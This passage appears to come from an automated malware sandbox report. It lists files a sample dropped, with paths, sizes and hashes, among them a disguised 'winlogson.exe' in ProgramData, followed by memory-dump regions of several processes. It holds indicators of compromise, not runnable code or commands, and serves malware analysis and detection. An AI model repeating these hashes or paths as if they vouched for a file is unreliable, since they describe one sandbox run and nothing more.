d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
761fee773ec1e1eb396eddddeb321865

SHA1
f969e9da9e90a5aef00730b8e1c3763ba2ac46c5

SHA256
82273f8e42cee630011c8e931351186391c4ca9e126e5921db275564e1ef7fbb

SHA512
3f648b7c88b1e0195acad5ad194b59f5de8f2bf9179b2cc330d7ef1a028d48141541545b2354137a2ab0105e92fb75d9e0e11c9250ee1bcb7a4f472de3637a5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
86e1cdde49ed533d5a3c42a6c725d45a

SHA1
8c0380b16fdd60a058100967f31d6cb8618e7ecf

SHA256
2d070df4305668a62bcde3b890eb2ed885c5d8f33c6a78ac8c92edf21bc96a9f

SHA512
b2de61ad095f55df550eb39e21db99bfddf40c217ee5485e14cba1b14daa9058adadb6dc03e734e107ebbbcc69bb506cca5e117358277eeb7ffa43ef508d9f81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ffea8e2f3df080051d32a0011d2f1a67

SHA1
8662c688ba777be2790eaab00aca96d1549f97b5

SHA256
1e20591b45fbebcd4eb345e5095774628a3c23a224166eb6be114246d9e6ae9a

SHA512
2b679dade2d186b403f488c0507b0d68c7a3940ccf4370cbd9bf07ae152fe06ed1e6dd8622ad1900a99044faaeb07167d498183bc2c7550fbc5b02d102de2264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
48f836b8f928d6f9ff59a78cea38c1e6

SHA1
828a5fda860c3b07776724739ce7105f7215b44c

SHA256
bc6a75a54c7d9797870080625a03594a59aaa57edecd272f1bc2fcfca91e030e

SHA512
873205397a1b9a72fc94aa88a1dc9b93685f43d4a3770d0fe4f37692a3d0871dc7a8c375b4d0a4c5dea68f9d420ad7fcddc6f7553705806a8850535d8ae06909

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
48f836b8f928d6f9ff59a78cea38c1e6

SHA1
828a5fda860c3b07776724739ce7105f7215b44c

SHA256
bc6a75a54c7d9797870080625a03594a59aaa57edecd272f1bc2fcfca91e030e

SHA512
873205397a1b9a72fc94aa88a1dc9b93685f43d4a3770d0fe4f37692a3d0871dc7a8c375b4d0a4c5dea68f9d420ad7fcddc6f7553705806a8850535d8ae06909

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
26bf1a52be8c523ad54a49d1a3c73f91

SHA1
228eeb9c06d4612edd7f9541521ed615f8aa5754

SHA256
1ff334be2296d805dd0187f9efe08c5236f59e4ed6170569b3b1169373ac1a0a

SHA512
58fd2fa58ef0aef95a779ec96d805404c0aba9a21881357b454b9c9aa570c6f746c554239fa8eed136891376128f6ceff9c7b6eb31d99961d6a0d25be7793600

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fk1ctzoi.rjp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/504-408-0x00000000078A0000-0x00000000078B0000-memory.dmp

Filesize
64KB

Download
memory/504-743-0x00000000078A0000-0x00000000078B0000-memory.dmp

Filesize
64KB

Download
memory/504-394-0x00000000008B0000-0x00000000008C6000-memory.dmp

Filesize
88KB

Download
memory/1764-128-0x000000000B4D0000-0x000000000B9CE000-memory.dmp

Filesize
5.0MB

Download
memory/1764-129-0x000000000B070000-0x000000000B102000-memory.dmp

Filesize
584KB

Download
memory/1764-131-0x000000000B110000-0x000000000B176000-memory.dmp

Filesize
408KB

Download
memory/1764-132-0x000000000B390000-0x000000000B3A0000-memory.dmp

Filesize
64KB

Download
memory/1764-389-0x000000000B390000-0x000000000B3A0000-memory.dmp

Filesize
64KB

Download
memory/1764-121-0x0000000000630000-0x0000000000658000-memory.dmp

Filesize
160KB

Download
memory/1764-130-0x000000000AFE0000-0x000000000AFEA000-memory.dmp

Filesize
40KB

Download
memory/1924-504-0x0000000008FC0000-0x0000000009065000-memory.dmp

Filesize
660KB

Download
memory/1924-541-0x00000000066C0000-0x00000000066D0000-memory.dmp

Filesize
64KB

Download
memory/1924-407-0x00000000074C0000-0x0000000007810000-memory.dmp

Filesize
3.3MB

Download
memory/1924-749-0x00000000066C0000-0x00000000066D0000-memory.dmp

Filesize
64KB

Download
memory/1924-409-0x00000000066C0000-0x00000000066D0000-memory.dmp

Filesize
64KB

Download
memory/1924-960-0x000000007F330000-0x000000007F340000-memory.dmp

Filesize
64KB

Download
memory/1924-503-0x000000007F330000-0x000000007F340000-memory.dmp

Filesize
64KB

Download
memory/1924-420-0x0000000007A10000-0x0000000007A5B000-memory.dmp

Filesize
300KB

Download
memory/1924-755-0x00000000066C0000-0x00000000066D0000-memory.dmp

Filesize
64KB

Download
memory/1924-410-0x00000000066C0000-0x00000000066D0000-memory.dmp

Filesize
64KB

Download
memory/1936-1715-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/2692-168-0x0000000009420000-0x00000000094B4000-memory.dmp

Filesize
592KB

Download
memory/2692-137-0x0000000004890000-0x00000000048A0000-memory.dmp

Filesize
64KB

Download
memory/2692-373-0x00000000093B0000-0x00000000093B8000-memory.dmp

Filesize
32KB

Download
memory/2692-368-0x00000000093C0000-0x00000000093DA000-memory.dmp

Filesize
104KB

Download
memory/2692-141-0x0000000007960000-0x0000000007CB0000-memory.dmp

Filesize
3.3MB

Download
memory/2692-142-0x00000000078D0000-0x00000000078EC000-memory.dmp

Filesize
112KB

Download
memory/2692-136-0x0000000006FE0000-0x0000000007608000-memory.dmp

Filesize
6.2MB

Download
memory/2692-167-0x0000000009160000-0x0000000009205000-memory.dmp

Filesize
660KB

Download
memory/2692-139-0x0000000006FB0000-0x0000000006FD2000-memory.dmp

Filesize
136KB

Download
memory/2692-161-0x0000000009100000-0x0000000009133000-memory.dmp

Filesize
204KB

Download
memory/2692-144-0x0000000008110000-0x0000000008186000-memory.dmp

Filesize
472KB

Download
memory/2692-143-0x0000000007F40000-0x0000000007F8B000-memory.dmp

Filesize
300KB

Download
memory/2692-162-0x0000000009140000-0x000000000915E000-memory.dmp

Filesize
120KB

Download
memory/2692-176-0x000000007EFE0000-0x000000007EFF0000-memory.dmp

Filesize
64KB

Download
memory/2692-178-0x0000000004890000-0x00000000048A0000-memory.dmp

Filesize
64KB

Download
memory/2692-138-0x0000000004890000-0x00000000048A0000-memory.dmp

Filesize
64KB

Download
memory/2692-140-0x0000000007860000-0x00000000078C6000-memory.dmp

Filesize
408KB

Download
memory/2692-135-0x00000000048A0000-0x00000000048D6000-memory.dmp

Filesize
216KB

Download
memory/2992-417-0x0000000006F20000-0x0000000006F30000-memory.dmp

Filesize
64KB

Download
memory/2992-801-0x0000000006F20000-0x0000000006F30000-memory.dmp

Filesize
64KB

Download
memory/2992-538-0x000000007EE60000-0x000000007EE70000-memory.dmp

Filesize
64KB

Download
memory/2992-604-0x0000000006F20000-0x0000000006F30000-memory.dmp

Filesize
64KB

Download
memory/2992-795-0x0000000006F20000-0x0000000006F30000-memory.dmp

Filesize
64KB

Download
memory/2992-418-0x0000000006F20000-0x0000000006F30000-memory.dmp

Filesize
64KB

Download
memory/3604-413-0x00000000073B0000-0x00000000073C0000-memory.dmp

Filesize
64KB

Download
memory/3604-555-0x00000000073B0000-0x00000000073C0000-memory.dmp

Filesize
64KB

Download
memory/3604-773-0x00000000073B0000-0x00000000073C0000-memory.dmp

Filesize
64KB

Download
memory/3604-779-0x00000000073B0000-0x00000000073C0000-memory.dmp

Filesize
64KB

Download
memory/3604-414-0x00000000073B0000-0x00000000073C0000-memory.dmp

Filesize
64KB

Download
memory/3604-1014-0x000000007F3C0000-0x000000007F3D0000-memory.dmp

Filesize
64KB

Download
memory/3604-531-0x000000007F3C0000-0x000000007F3D0000-memory.dmp

Filesize
64KB

Download
memory/3792-1009-0x000000007F7E0000-0x000000007F7F0000-memory.dmp

Filesize
64KB

Download
memory/3792-545-0x0000000006670000-0x0000000006680000-memory.dmp

Filesize
64KB

Download
memory/3792-760-0x0000000006670000-0x0000000006680000-memory.dmp

Filesize
64KB

Download
memory/3792-767-0x0000000006670000-0x0000000006680000-memory.dmp

Filesize
64KB

Download
memory/3792-411-0x0000000006670000-0x0000000006680000-memory.dmp

Filesize
64KB

Download
memory/3792-412-0x0000000006670000-0x0000000006680000-memory.dmp

Filesize
64KB

Download
memory/3792-505-0x000000007F7E0000-0x000000007F7F0000-memory.dmp

Filesize
64KB

Download
memory/4444-549-0x0000000006A00000-0x0000000006A10000-memory.dmp

Filesize
64KB

Download
memory/4444-416-0x0000000006A00000-0x0000000006A10000-memory.dmp

Filesize
64KB

Download
memory/4444-415-0x0000000006A00000-0x0000000006A10000-memory.dmp

Filesize
64KB

Download
memory/4444-535-0x000000007F630000-0x000000007F640000-memory.dmp

Filesize
64KB

Download
memory/4444-1066-0x000000007F630000-0x000000007F640000-memory.dmp

Filesize
64KB

Download
memory/4444-784-0x0000000006A00000-0x0000000006A10000-memory.dmp

Filesize
64KB

Download
memory/4444-790-0x0000000006A00000-0x0000000006A10000-memory.dmp

Filesize
64KB

Download
memory/5072-1710-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/5072-1711-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download